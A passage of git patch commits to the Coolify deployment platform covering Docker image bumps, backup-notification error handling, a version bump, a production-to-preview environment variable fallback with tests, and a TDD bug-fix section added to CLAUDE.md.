                 $pool->purge("$bunny_cdn/$bunny_cdn_path/$install_script"),
             ]);
-            $this->info('All files uploaded & purged...');
+            $this->info('All files uploaded & purged to BunnyCDN.');
+            $this->newLine();
+
+            // Sync files to GitHub CDN repository via PR
+            $this->info('Creating GitHub PR for coolify-cdn repository...');
+            if ($nightly) {
+                $files = [
+                    $compose_file_location => 'docker/nightly/docker-compose.yml',
+                    $compose_file_prod_location => 'docker/nightly/docker-compose.prod.yml',
+                    $production_env_location => 'environment/nightly/.env.production',
+                    $upgrade_script_location => 'scripts/nightly/upgrade.sh',
+                    $install_script_location => 'scripts/nightly/install.sh',
+                ];
+            } else {
+                $files = [
+                    $compose_file_location => 'docker/docker-compose.yml',
+                    $compose_file_prod_location => 'docker/docker-compose.prod.yml',
+                    $production_env_location => 'environment/.env.production',
+                    $upgrade_script_location => 'scripts/upgrade.sh',
+                    $install_script_location => 'scripts/install.sh',
+                ];
+            }
+
+            $githubSuccess = $this->syncFilesToGitHubRepo($files, $nightly);
+            $this->newLine();
+            $this->info('=== Summary ===');
+            $this->info('BunnyCDN sync: Complete');
+            $this->info('GitHub PR: '.($githubSuccess ? 'Created' : 'Failed'));
         } catch (\Throwable $e) {
             $this->error('Error: '.$e->getMessage());
         }

From b8b49b9f4226add14a1789fe221659d5fc8e8ec2 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 07:13:54 +0100
Subject: [PATCH 125/213] chore(docker): update container image versions

- Bump coolify-realtime from 1.0.10 to 1.0.11
- Pin redis to 7-alpine across all compose files
- Remove unnecessary quotes in extra_hosts entries
---
 other/nightly/docker-compose.prod.yml    | 2 +-
 other/nightly/docker-compose.windows.yml | 2 +-
 other/nightly/docker-compose.yml         | 6 +++---
 3 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/other/nightly/docker-compose.prod.yml b/other/nightly/docker-compose.prod.yml
index d42047245..0bd4ae2dd 100644
--- a/other/nightly/docker-compose.prod.yml
+++ b/other/nightly/docker-compose.prod.yml
@@ -60,7 +60,7 @@ services:
       retries: 10
       timeout: 2s
   soketi:
-    image: '${REGISTRY_URL:-ghcr.io}/coollabsio/coolify-realtime:1.0.10'
+    image: '${REGISTRY_URL:-ghcr.io}/coollabsio/coolify-realtime:1.0.11'
     ports:
       - "${SOKETI_PORT:-6001}:6001"
       - "6002:6002"
diff --git a/other/nightly/docker-compose.windows.yml b/other/nightly/docker-compose.windows.yml
index bf1f94af0..ca233356a 100644
--- a/other/nightly/docker-compose.windows.yml
+++ b/other/nightly/docker-compose.windows.yml
@@ -79,7 +79,7 @@ services:
       retries: 10
       timeout: 2s
   redis:
-    image: redis:alpine
+    image: redis:7-alpine
     pull_policy: always
     container_name: coolify-redis
     restart: always
diff --git a/other/nightly/docker-compose.yml b/other/nightly/docker-compose.yml
index 68d0f0744..0fd3dda07 100644
--- a/other/nightly/docker-compose.yml
+++ b/other/nightly/docker-compose.yml
@@ -4,7 +4,7 @@ services:
         restart: always
         working_dir: /var/www/html
         extra_hosts:
-            - 'host.docker.internal:host-gateway'
+            - host.docker.internal:host-gateway
         networks:
             - coolify
         depends_on:
@@ -18,7 +18,7 @@ services:
         networks:
             - coolify
     redis:
-        image: redis:alpine
+        image: redis:7-alpine
         container_name: coolify-redis
         restart: always
         networks:
@@ -26,7 +26,7 @@ services:
     soketi:
         container_name: coolify-realtime
         extra_hosts:
-            - 'host.docker.internal:host-gateway'
+            - host.docker.internal:host-gateway
         restart: always
         networks:
             - coolify

From 14a7f8646cad266d567035a7beb9cf6cfd90d54c Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 12:43:47 +0100
Subject: [PATCH 126/213] fix(backup): prevent notification failures from
 affecting backup status

- Wrap notification calls in try-catch blocks to log failures instead
- Prevent failed() method from overwriting successful backup status
- Skip failure notifications if backup already completed successfully
- Ensures post-backup errors (e.g. notification failures) never
  retroactively mark successful backups as failed

Fixes #9088
---
 app/Jobs/DatabaseBackupJob.php          | 61 ++++++++++++++------
 tests/Feature/DatabaseBackupJobTest.php | 76 +++++++++++++++++++++++++
 2 files changed, 121 insertions(+), 16 deletions(-)

diff --git a/app/Jobs/DatabaseBackupJob.php b/app/Jobs/DatabaseBackupJob.php
index b55c324be..041d31bad 100644
--- a/app/Jobs/DatabaseBackupJob.php
+++ b/app/Jobs/DatabaseBackupJob.php
@@ -399,7 +399,15 @@ public function handle(): void
                             's3_uploaded' => null,
                         ]);
                     }
-                    $this->team?->notify(new BackupFailed($this->backup, $this->database, $this->error_output ?? $this->backup_output ?? $e->getMessage(), $database));
+                    try {
+                        $this->team?->notify(new BackupFailed($this->backup, $this->database, $this->error_output ?? $this->backup_output ?? $e->getMessage(), $database));
+                    } catch (\Throwable $notifyException) {
+                        Log::channel('scheduled-errors')->warning('Failed to send backup failure notification', [
+                            'backup_id' => $this->backup->uuid,
+                            'database' => $database,
+                            'error' => $notifyException->getMessage(),
+                        ]);
+                    }
 
                     continue;
                 }
@@ -439,11 +447,20 @@ public function handle(): void
                         'local_storage_deleted' => $localStorageDeleted,
                     ]);
 
-                    // Send appropriate notification
-                    if ($s3UploadError) {
-                        $this->team->notify(new BackupSuccessWithS3Warning($this->backup, $this->database, $database, $s3UploadError));
-                    } else {
-                        $this->team->notify(new BackupSuccess($this->backup, $this->database, $database));
+                    // Send appropriate notification (wrapped in try-catch so notification
+                    // failures never affect backup status — see GitHub issue #9088)
+                    try {
+                        if ($s3UploadError) {
+                            $this->team->notify(new BackupSuccessWithS3Warning($this->backup, $this->database, $database, $s3UploadError));
+                        } else {
+                            $this->team->notify(new BackupSuccess($this->backup, $this->database, $database));
+                        }
+                    } catch (\Throwable $e) {
+                        Log::channel('scheduled-errors')->warning('Failed to send backup success notification', [
+                            'backup_id' => $this->backup->uuid,
+                            'database' => $database,
+                            'error' => $e->getMessage(),
+                        ]);
                     }
                 }
             }
@@ -710,20 +727,32 @@ public function failed(?Throwable $exception): void
         $log = ScheduledDatabaseBackupExecution::where('uuid', $this->backup_log_uuid)->first();
 
         if ($log) {
-            $log->update([
-                'status' => 'failed',
-                'message' => 'Job permanently failed after '.$this->attempts().' attempts: '.($exception?->getMessage() ?? 'Unknown error'),
-                'size' => 0,
-                'filename' => null,
-                'finished_at' => Carbon::now(),
-            ]);
+            // Don't overwrite a successful backup status — a post-backup error
+            // (e.g. notification failure) should not retroactively mark the backup
+            // as failed (see GitHub issue #9088)
+            if ($log->status !== 'success') {
+                $log->update([
+                    'status' => 'failed',
+                    'message' => 'Job permanently failed after '.$this->attempts().' attempts: '.($exception?->getMessage() ?? 'Unknown error'),
+                    'size' => 0,
+                    'filename' => null,
+                    'finished_at' => Carbon::now(),
+                ]);
+            }
         }
 
-        // Notify team about permanent failure
-        if ($this->team) {
+        // Notify team about permanent failure (only if backup didn't already succeed)
+        if ($this->team && $log?->status !== 'success') {
             $databaseName = $log?->database_name ?? 'unknown';
             $output = $this->backup_output ?? $exception?->getMessage() ?? 'Unknown error';
-            $this->team->notify(new BackupFailed($this->backup, $this->database, $output, $databaseName));
+            try {
+                $this->team->notify(new BackupFailed($this->backup, $this->database, $output, $databaseName));
+            } catch (\Throwable $e) {
+                Log::channel('scheduled-errors')->warning('Failed to send backup permanent failure notification', [
+                    'backup_id' => $this->backup->uuid,
+                    'error' => $e->getMessage(),
+                ]);
+            }
         }
     }
 }
diff --git a/tests/Feature/DatabaseBackupJobTest.php b/tests/Feature/DatabaseBackupJobTest.php
index 37c377dab..05cb21f12 100644
--- a/tests/Feature/DatabaseBackupJobTest.php
+++ b/tests/Feature/DatabaseBackupJobTest.php
@@ -120,6 +120,82 @@
     expect($unrelatedBackup->save_s3)->toBeTruthy();
 });
 
+test('failed method does not overwrite successful backup status', function () {
+    $team = Team::factory()->create();
+
+    $backup = ScheduledDatabaseBackup::create([
+        'frequency' => '0 0 * * *',
+        'save_s3' => false,
+        'database_type' => 'App\Models\StandalonePostgresql',
+        'database_id' => 1,
+        'team_id' => $team->id,
+    ]);
+
+    $log = ScheduledDatabaseBackupExecution::create([
+        'uuid' => 'test-uuid-success-guard',
+        'database_name' => 'test_db',
+        'filename' => '/backup/test.dmp',
+        'scheduled_database_backup_id' => $backup->id,
+        'status' => 'success',
+        'message' => 'Backup completed successfully',
+        'size' => 1024,
+    ]);
+
+    $job = new DatabaseBackupJob($backup);
+
+    $reflection = new ReflectionClass($job);
+
+    $teamProp = $reflection->getProperty('team');
+    $teamProp->setValue($job, $team);
+
+    $logUuidProp = $reflection->getProperty('backup_log_uuid');
+    $logUuidProp->setValue($job, 'test-uuid-success-guard');
+
+    // Simulate a post-backup failure (e.g. notification error)
+    $job->failed(new Exception('Request to the Resend API failed'));
+
+    $log->refresh();
+    expect($log->status)->toBe('success');
+    expect($log->message)->toBe('Backup completed successfully');
+    expect($log->size)->toBe(1024);
+});
+
+test('failed method updates status when backup was not successful', function () {
+    $team = Team::factory()->create();
+
+    $backup = ScheduledDatabaseBackup::create([
+        'frequency' => '0 0 * * *',
+        'save_s3' => false,
+        'database_type' => 'App\Models\StandalonePostgresql',
+        'database_id' => 1,
+        'team_id' => $team->id,
+    ]);
+
+    $log = ScheduledDatabaseBackupExecution::create([
+        'uuid' => 'test-uuid-pending-guard',
+        'database_name' => 'test_db',
+        'filename' => '/backup/test.dmp',
+        'scheduled_database_backup_id' => $backup->id,
+        'status' => 'pending',
+    ]);
+
+    $job = new DatabaseBackupJob($backup);
+
+    $reflection = new ReflectionClass($job);
+
+    $teamProp = $reflection->getProperty('team');
+    $teamProp->setValue($job, $team);
+
+    $logUuidProp = $reflection->getProperty('backup_log_uuid');
+    $logUuidProp->setValue($job, 'test-uuid-pending-guard');
+
+    $job->failed(new Exception('Some real failure'));
+
+    $log->refresh();
+    expect($log->status)->toBe('failed');
+    expect($log->message)->toContain('Some real failure');
+});
+
 test('s3 storage has scheduled backups relationship', function () {
     $team = Team::factory()->create();
 

From ca769baf179569e07a241967b6df9a77f2d56ba4 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 13:25:41 +0100
Subject: [PATCH 127/213] chore: bump version to 4.0.0-beta.471

---
 config/constants.php        | 2 +-
 other/nightly/versions.json | 2 +-
 versions.json               | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/config/constants.php b/config/constants.php
index b0a772541..828493208 100644
--- a/config/constants.php
+++ b/config/constants.php
@@ -2,7 +2,7 @@
 
 return [
     'coolify' => [
-        'version' => '4.0.0-beta.470',
+        'version' => '4.0.0-beta.471',
         'helper_version' => '1.0.12',
         'realtime_version' => '1.0.11',
         'self_hosted' => env('SELF_HOSTED', true),
diff --git a/other/nightly/versions.json b/other/nightly/versions.json
index c2ab7a7c1..af11ef4d3 100644
--- a/other/nightly/versions.json
+++ b/other/nightly/versions.json
@@ -1,7 +1,7 @@
 {
     "coolify": {
         "v4": {
-            "version": "4.0.0-beta.470"
+            "version": "4.0.0-beta.471"
         },
         "nightly": {
             "version": "4.0.0"
diff --git a/versions.json b/versions.json
index c2ab7a7c1..af11ef4d3 100644
--- a/versions.json
+++ b/versions.json
@@ -1,7 +1,7 @@
 {
     "coolify": {
         "v4": {
-            "version": "4.0.0-beta.470"
+            "version": "4.0.0-beta.471"
         },
         "nightly": {
             "version": "4.0.0"

From 3034e89edb3c01c82468af52ae51c60fdcb23395 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 13:26:50 +0100
Subject: [PATCH 128/213] feat(preview-env): add production variable fallback
 for docker-compose

When preview environment variables are configured, fall back to production
variables for keys not overridden by preview values. This ensures variables
like DB_PASSWORD that exist only in production are available in the preview
.env file, enabling proper ${VAR} interpolation in docker-compose YAML.

Fallback only applies when preview variables are configured, preventing
unintended leakage of production values when previews aren't in use.

Also improves UI by hiding the Domains section when only database services
are present, and simplifies the logs view by removing status checks.
---
 app/Jobs/ApplicationDeploymentJob.php         |  16 ++
 app/Models/EnvironmentVariable.php            |   5 +
 .../components/applications/links.blade.php   |   2 +-
 .../project/application/general.blade.php     |  36 ++-
 .../livewire/project/shared/logs.blade.php    |  58 ++--
 tests/Feature/PreviewEnvVarFallbackTest.php   | 247 ++++++++++++++++++
 6 files changed, 318 insertions(+), 46 deletions(-)
 create mode 100644 tests/Feature/PreviewEnvVarFallbackTest.php

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 9d927d10c..2af380a45 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -1333,6 +1333,22 @@ private function generate_runtime_environment_variables()
             foreach ($runtime_environment_variables_preview as $env) {
                 $envs->push($env->key.'='.$env->real_value);
             }
+
+            // Fall back to production env vars for keys not overridden by preview vars,
+            // but only when preview vars are configured. This ensures variables like
+            // DB_PASSWORD that are only set for production will be available in the
+            // preview .env file (fixing ${VAR} interpolation in docker-compose YAML),
+            // while avoiding leaking production values when previews aren't configured.
+            if ($runtime_environment_variables_preview->isNotEmpty()) {
+                $previewKeys = $runtime_environment_variables_preview->pluck('key')->toArray();
+                $fallback_production_vars = $sorted_environment_variables->filter(function ($env) use ($previewKeys) {
+                    return $env->is_runtime && ! in_array($env->key, $previewKeys);
+                });
+                foreach ($fallback_production_vars as $env) {
+                    $envs->push($env->key.'='.$env->real_value);
+                }
+            }
+
             // Add PORT if not exists, use the first port as default
             if ($this->build_pack !== 'dockercompose') {
                 if ($this->application->environment_variables_preview->where('key', 'PORT')->isEmpty()) {
diff --git a/app/Models/EnvironmentVariable.php b/app/Models/EnvironmentVariable.php
index cf60d5ab5..5acd4c1e4 100644
--- a/app/Models/EnvironmentVariable.php
+++ b/app/Models/EnvironmentVariable.php
@@ -32,6 +32,11 @@
 )]
 class EnvironmentVariable extends BaseModel
 {
+    protected $attributes = [
+        'is_runtime' => true,
+        'is_buildtime' => true,
+    ];
+
     protected $fillable = [
         // Core identification
         'key',
diff --git a/resources/views/components/applications/links.blade.php b/resources/views/components/applications/links.blade.php
index 26b1cedf5..85e8f7431 100644
--- a/resources/views/components/applications/links.blade.php
+++ b/resources/views/components/applications/links.blade.php
@@ -4,7 +4,7 @@
     </x-slot>
     @if (
         (data_get($application, 'fqdn') ||
-            collect(json_decode($this->application->docker_compose_domains))->count() > 0 ||
+            collect(json_decode($this->application->docker_compose_domains))->contains(fn($fqdn) => !empty(data_get($fqdn, 'domain'))) ||
             data_get($application, 'previews', collect([]))->count() > 0 ||
             data_get($application, 'ports_mappings_array')) &&
             data_get($application, 'settings.is_raw_compose_deployment_enabled') !== true)
diff --git a/resources/views/livewire/project/application/general.blade.php b/resources/views/livewire/project/application/general.blade.php
index e27eda8b6..d743e346e 100644
--- a/resources/views/livewire/project/application/general.blade.php
+++ b/resources/views/livewire/project/application/general.blade.php
@@ -49,7 +49,13 @@
                             !is_null($parsedServices) &&
                                 count($parsedServices) > 0 &&
                                 !$application->settings->is_raw_compose_deployment_enabled)
-                            <h3 class="pt-6">Domains</h3>
+                            @php
+                                $hasNonDatabaseService = collect(data_get($parsedServices, 'services', []))
+                                    ->contains(fn($service) => !isDatabaseImage(data_get($service, 'image')));
+                            @endphp
+                            @if ($hasNonDatabaseService)
+                                <h3 class="pt-6">Domains</h3>
+                            @endif
                             @foreach (data_get($parsedServices, 'services') as $serviceName => $service)
                                 @if (!isDatabaseImage(data_get($service, 'image')))
                                     <div class="flex items-end gap-2">
@@ -86,18 +92,20 @@
                         ]" />
                 @endcan
             @endif
-            <div class="w-96 pb-6">
-                @if ($application->could_set_build_commands())
-                    <x-forms.checkbox instantSave id="isStatic" label="Is it a static site?"
-                        helper="If your application is a static site or the final build assets should be served as a static site, enable this."
-                        x-bind:disabled="!canUpdate" />
-                @endif
-                @if ($isStatic && $buildPack !== 'static')
-                    <x-forms.checkbox label="Is it a SPA (Single Page Application)?"
-                        helper="If your application is a SPA, enable this." id="isSpa" instantSave
-                        x-bind:disabled="!canUpdate"></x-forms.checkbox>
-                @endif
-            </div>
+            @if ($application->could_set_build_commands() || ($isStatic && $buildPack !== 'static'))
+                <div class="w-96 pb-6">
+                    @if ($application->could_set_build_commands())
+                        <x-forms.checkbox instantSave id="isStatic" label="Is it a static site?"
+                            helper="If your application is a static site or the final build assets should be served as a static site, enable this."
+                            x-bind:disabled="!canUpdate" />
+                    @endif
+                    @if ($isStatic && $buildPack !== 'static')
+                        <x-forms.checkbox label="Is it a SPA (Single Page Application)?"
+                            helper="If your application is a SPA, enable this." id="isSpa" instantSave
+                            x-bind:disabled="!canUpdate"></x-forms.checkbox>
+                    @endif
+                </div>
+            @endif
             @if ($buildPack !== 'dockercompose')
                 <div class="flex items-end gap-2">
                     @if ($application->settings->is_container_label_readonly_enabled == false)
@@ -209,7 +217,7 @@ class="underline" href="https://coolify.io/docs/knowledge-base/docker/registry"
                     @endif
                 </div>
             @endif
-            <div>
+            <div class="pt-6">
                 <h3>Build</h3>
                 @if ($application->build_pack === 'dockerimage')
                     <x-forms.input
diff --git a/resources/views/livewire/project/shared/logs.blade.php b/resources/views/livewire/project/shared/logs.blade.php
index 3a1afaa1c..7193555f3 100644
--- a/resources/views/livewire/project/shared/logs.blade.php
+++ b/resources/views/livewire/project/shared/logs.blade.php
@@ -8,39 +8,35 @@
         <livewire:project.application.heading :application="$resource" />
         <div>
             <h2>Logs</h2>
-            @if (str($status)->contains('exited'))
-                <div class="pt-4">The resource is not running.</div>
-            @else
-                <div class="pt-2" wire:loading wire:target="loadAllContainers">
-                    Loading containers...
-                </div>
-                <div x-init="$wire.loadAllContainers()" wire:loading.remove wire:target="loadAllContainers">
-                    @forelse ($servers as $server)
-                        <div class="py-2">
-                            <h4>Server: {{ $server->name }}</h4>
-                            @if ($server->isFunctional())
-                                @if (isset($serverContainers[$server->id]) && count($serverContainers[$server->id]) > 0)
-                                    @php
-                                        $totalContainers = collect($serverContainers)->flatten(1)->count();
-                                    @endphp
-                                    @foreach ($serverContainers[$server->id] as $container)
-                                        <livewire:project.shared.get-logs
-                                            wire:key="{{ data_get($container, 'ID', uniqid()) }}" :server="$server"
-                                            :resource="$resource" :container="data_get($container, 'Names')"
-                                            :expandByDefault="$totalContainers === 1" />
-                                    @endforeach
-                                @else
-                                    <div class="pt-2">No containers are running on server: {{ $server->name }}</div>
-                                @endif
+            <div class="pt-2" wire:loading wire:target="loadAllContainers">
+                Loading containers...
+            </div>
+            <div x-init="$wire.loadAllContainers()" wire:loading.remove wire:target="loadAllContainers">
+                @forelse ($servers as $server)
+                    <div class="py-2">
+                        <h4>Server: {{ $server->name }}</h4>
+                        @if ($server->isFunctional())
+                            @if (isset($serverContainers[$server->id]) && count($serverContainers[$server->id]) > 0)
+                                @php
+                                    $totalContainers = collect($serverContainers)->flatten(1)->count();
+                                @endphp
+                                @foreach ($serverContainers[$server->id] as $container)
+                                    <livewire:project.shared.get-logs
+                                        wire:key="{{ data_get($container, 'ID', uniqid()) }}" :server="$server"
+                                        :resource="$resource" :container="data_get($container, 'Names')"
+                                        :expandByDefault="$totalContainers === 1" />
+                                @endforeach
                             @else
-                                <div class="pt-2">Server {{ $server->name }} is not functional.</div>
+                                <div class="pt-2">No containers are running on server: {{ $server->name }}</div>
                             @endif
-                        </div>
-                    @empty
-                        <div>No functional server found for the application.</div>
-                    @endforelse
-                </div>
-            @endif
+                        @else
+                            <div class="pt-2">Server {{ $server->name }} is not functional.</div>
+                        @endif
+                    </div>
+                @empty
+                    <div>No functional server found for the application.</div>
+                @endforelse
+            </div>
         </div>
     @elseif ($type === 'database')
         <h1>Logs</h1>
diff --git a/tests/Feature/PreviewEnvVarFallbackTest.php b/tests/Feature/PreviewEnvVarFallbackTest.php
new file mode 100644
index 000000000..e3fc3023f
--- /dev/null
+++ b/tests/Feature/PreviewEnvVarFallbackTest.php
@@ -0,0 +1,247 @@
+<?php
+
+use App\Models\Application;
+use App\Models\Environment;
+use App\Models\EnvironmentVariable;
+use App\Models\Project;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->user = User::factory()->create();
+    $this->team = Team::factory()->create();
+    $this->user->teams()->attach($this->team);
+
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create([
+        'project_id' => $this->project->id,
+    ]);
+
+    $this->application = Application::factory()->create([
+        'environment_id' => $this->environment->id,
+    ]);
+
+    $this->actingAs($this->user);
+});
+
+/**
+ * Simulate the preview .env generation logic from
+ * ApplicationDeploymentJob::generate_runtime_environment_variables()
+ * including the production fallback fix.
+ */
+function simulatePreviewEnvGeneration(Application $application): \Illuminate\Support\Collection
+{
+    $sorted_environment_variables = $application->environment_variables->sortBy('id');
+    $sorted_environment_variables_preview = $application->environment_variables_preview->sortBy('id');
+
+    $envs = collect([]);
+
+    // Preview vars
+    $runtime_environment_variables_preview = $sorted_environment_variables_preview->filter(fn ($env) => $env->is_runtime);
+    foreach ($runtime_environment_variables_preview as $env) {
+        $envs->push($env->key.'='.$env->real_value);
+    }
+
+    // Fallback: production vars not overridden by preview,
+    // only when preview vars are configured
+    if ($runtime_environment_variables_preview->isNotEmpty()) {
+        $previewKeys = $runtime_environment_variables_preview->pluck('key')->toArray();
+        $fallback_production_vars = $sorted_environment_variables->filter(function ($env) use ($previewKeys) {
+            return $env->is_runtime && ! in_array($env->key, $previewKeys);
+        });
+        foreach ($fallback_production_vars as $env) {
+            $envs->push($env->key.'='.$env->real_value);
+        }
+    }
+
+    return $envs;
+}
+
+test('production vars fall back when preview vars exist but do not cover all keys', function () {
+    // Create two production vars (booted hook auto-creates preview copies)
+    EnvironmentVariable::create([
+        'key' => 'DB_PASSWORD',
+        'value' => 'secret123',
+        'is_preview' => false,
+        'is_runtime' => true,
+        'is_buildtime' => false,
+        'resourceable_type' => Application::class,
+        'resourceable_id' => $this->application->id,
+    ]);
+
+    EnvironmentVariable::create([
+        'key' => 'APP_KEY',
+        'value' => 'app_key_value',
+        'is_preview' => false,
+        'is_runtime' => true,
+        'is_buildtime' => false,
+        'resourceable_type' => Application::class,
+        'resourceable_id' => $this->application->id,
+    ]);
+
+    // Delete only the DB_PASSWORD preview copy — APP_KEY preview copy remains
+    $this->application->environment_variables_preview()->where('key', 'DB_PASSWORD')->delete();
+    $this->application->refresh();
+
+    // Preview has APP_KEY but not DB_PASSWORD
+    expect($this->application->environment_variables_preview()->where('key', 'APP_KEY')->count())->toBe(1);
+    expect($this->application->environment_variables_preview()->where('key', 'DB_PASSWORD')->count())->toBe(0);
+
+    $envs = simulatePreviewEnvGeneration($this->application);
+
+    $envString = $envs->implode("\n");
+    // DB_PASSWORD should fall back from production
+    expect($envString)->toContain('DB_PASSWORD=');
+    // APP_KEY should use the preview value
+    expect($envString)->toContain('APP_KEY=');
+});
+
+test('no fallback when no preview vars are configured at all', function () {
+    // Create a production-only var (booted hook auto-creates preview copy)
+    EnvironmentVariable::create([
+        'key' => 'DB_PASSWORD',
+        'value' => 'secret123',
+        'is_preview' => false,
+        'is_runtime' => true,
+        'is_buildtime' => false,
+        'resourceable_type' => Application::class,
+        'resourceable_id' => $this->application->id,
+    ]);
+
+    // Delete ALL preview copies — simulates no preview config
+    $this->application->environment_variables_preview()->delete();
+    $this->application->refresh();
+
+    expect($this->application->environment_variables_preview()->count())->toBe(0);
+
+    $envs = simulatePreviewEnvGeneration($this->application);
+
+    $envString = $envs->implode("\n");
+    // Should NOT fall back to production when no preview vars exist
+    expect($envString)->not->toContain('DB_PASSWORD=');
+});
+
+test('preview var overrides production var when both exist', function () {
+    // Create production var (auto-creates preview copy)
+    EnvironmentVariable::create([
+        'key' => 'DB_PASSWORD',
+        'value' => 'prod_password',
+        'is_preview' => false,
+        'is_runtime' => true,
+        'is_buildtime' => false,
+        'resourceable_type' => Application::class,
+        'resourceable_id' => $this->application->id,
+    ]);
+
+    // Update the auto-created preview copy with a different value
+    $this->application->environment_variables_preview()
+        ->where('key', 'DB_PASSWORD')
+        ->update(['value' => encrypt('preview_password')]);
+
+    $this->application->refresh();
+    $envs = simulatePreviewEnvGeneration($this->application);
+
+    // Should contain preview value only, not production
+    $envEntries = $envs->filter(fn ($e) => str_starts_with($e, 'DB_PASSWORD='));
+    expect($envEntries)->toHaveCount(1);
+    expect($envEntries->first())->toContain('preview_password');
+});
+
+test('preview-only var works without production counterpart', function () {
+    // Create a preview-only var directly (no production counterpart)
+    EnvironmentVariable::create([
+        'key' => 'PREVIEW_ONLY_VAR',
+        'value' => 'preview_value',
+        'is_preview' => true,
+        'is_runtime' => true,
+        'is_buildtime' => false,
+        'resourceable_type' => Application::class,
+        'resourceable_id' => $this->application->id,
+    ]);
+
+    $this->application->refresh();
+    $envs = simulatePreviewEnvGeneration($this->application);
+
+    $envString = $envs->implode("\n");
+    expect($envString)->toContain('PREVIEW_ONLY_VAR=');
+});
+
+test('buildtime-only production vars are not included in preview fallback', function () {
+    // Create a runtime preview var so fallback is active
+    EnvironmentVariable::create([
+        'key' => 'SOME_PREVIEW_VAR',
+        'value' => 'preview_value',
+        'is_preview' => true,
+        'is_runtime' => true,
+        'is_buildtime' => false,
+        'resourceable_type' => Application::class,
+        'resourceable_id' => $this->application->id,
+    ]);
+
+    // Create a buildtime-only production var
+    EnvironmentVariable::create([
+        'key' => 'BUILD_SECRET',
+        'value' => 'build_only',
+        'is_preview' => false,
+        'is_runtime' => false,
+        'is_buildtime' => true,
+        'resourceable_type' => Application::class,
+        'resourceable_id' => $this->application->id,
+    ]);
+
+    // Delete the auto-created preview copy of BUILD_SECRET
+    $this->application->environment_variables_preview()->where('key', 'BUILD_SECRET')->delete();
+    $this->application->refresh();
+
+    $envs = simulatePreviewEnvGeneration($this->application);
+
+    $envString = $envs->implode("\n");
+    expect($envString)->not->toContain('BUILD_SECRET');
+    expect($envString)->toContain('SOME_PREVIEW_VAR=');
+});
+
+test('preview env var inherits is_runtime and is_buildtime from production var', function () {
+    // Create production var WITH explicit flags
+    EnvironmentVariable::create([
+        'key' => 'DB_PASSWORD',
+        'value' => 'secret123',
+        'is_preview' => false,
+        'is_runtime' => true,
+        'is_buildtime' => true,
+        'resourceable_type' => Application::class,
+        'resourceable_id' => $this->application->id,
+    ]);
+
+    $preview = EnvironmentVariable::where('key', 'DB_PASSWORD')
+        ->where('is_preview', true)
+        ->where('resourceable_id', $this->application->id)
+        ->first();
+
+    expect($preview)->not->toBeNull();
+    expect($preview->is_runtime)->toBeTrue();
+    expect($preview->is_buildtime)->toBeTrue();
+});
+
+test('preview env var gets correct defaults when production var created without explicit flags', function () {
+    // Simulate code paths (docker-compose parser, dev view bulk submit) that create
+    // env vars without explicitly setting is_runtime/is_buildtime
+    EnvironmentVariable::create([
+        'key' => 'DB_PASSWORD',
+        'value' => 'secret123',
+        'is_preview' => false,
+        'resourceable_type' => Application::class,
+        'resourceable_id' => $this->application->id,
+    ]);
+
+    $preview = EnvironmentVariable::where('key', 'DB_PASSWORD')
+        ->where('is_preview', true)
+        ->where('resourceable_id', $this->application->id)
+        ->first();
+
+    expect($preview)->not->toBeNull();
+    expect($preview->is_runtime)->toBeTrue();
+    expect($preview->is_buildtime)->toBeTrue();
+});

From 69ea7dfa50f431fd205b2adb18b04d41c92443f2 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 14:08:48 +0100
Subject: [PATCH 129/213] docs(tdd): add bug fix workflow section with TDD
 requirements

Add a new "Bug Fix Workflow (TDD)" section that establishes the strict
test-driven development process for bug fixes. Clarify that every bug fix
must follow TDD: write a failing test, fix the bug, verify the test passes
without modification. Update the Key Conventions to reference this workflow.
---
 CLAUDE.md | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/CLAUDE.md b/CLAUDE.md
index 8e398586b..5dc2f7eee 100644
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -73,7 +73,7 @@ ## Key Conventions
 - PHP 8.4: constructor property promotion, explicit return types, type hints
 - Always create Form Request classes for validation
 - Run `vendor/bin/pint --dirty --format agent` before finalizing changes
-- Every change must have tests — write or update tests, then run them
+- Every change must have tests — write or update tests, then run them. For bug fixes, follow TDD: write a failing test first, then fix the bug (see Test Enforcement below)
 - Check sibling files for conventions before creating new files
 
 ## Git Workflow
@@ -231,6 +231,16 @@ # Test Enforcement
 - Every change must be programmatically tested. Write a new test or update an existing test, then run the affected tests to make sure they pass.
 - Run the minimum number of tests needed to ensure code quality and speed. Use `php artisan test --compact` with a specific filename or filter.
 
+## Bug Fix Workflow (TDD)
+
+When fixing a bug, follow this strict test-driven workflow:
+
+1. **Write a test first** that asserts the correct (expected) behavior — this test should reproduce the bug.
+2. **Run the test** and confirm it **fails**. If it passes, the test does not cover the bug — rewrite it.
+3. **Fix the bug** in the source code.
+4. **Re-run the exact same test without any modifications** and confirm it **passes**.
+5. **Never modify the test between steps 2 and 4.** The same test must go from red to green purely from the bug fix.
+
 === laravel/core rules ===
 
 # Do Things the Laravel Way

From 811ee5d327da600614dc182cbe66d6bae266686b Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 14:09:07 +0100
Subject: [PATCH 130/213] refactor(jobs): extract container resolution logic
 for deployment commands

Extract common container selection logic into resolveCommandContainer() method
that handles both single and multi-container app scenarios. This consolidates
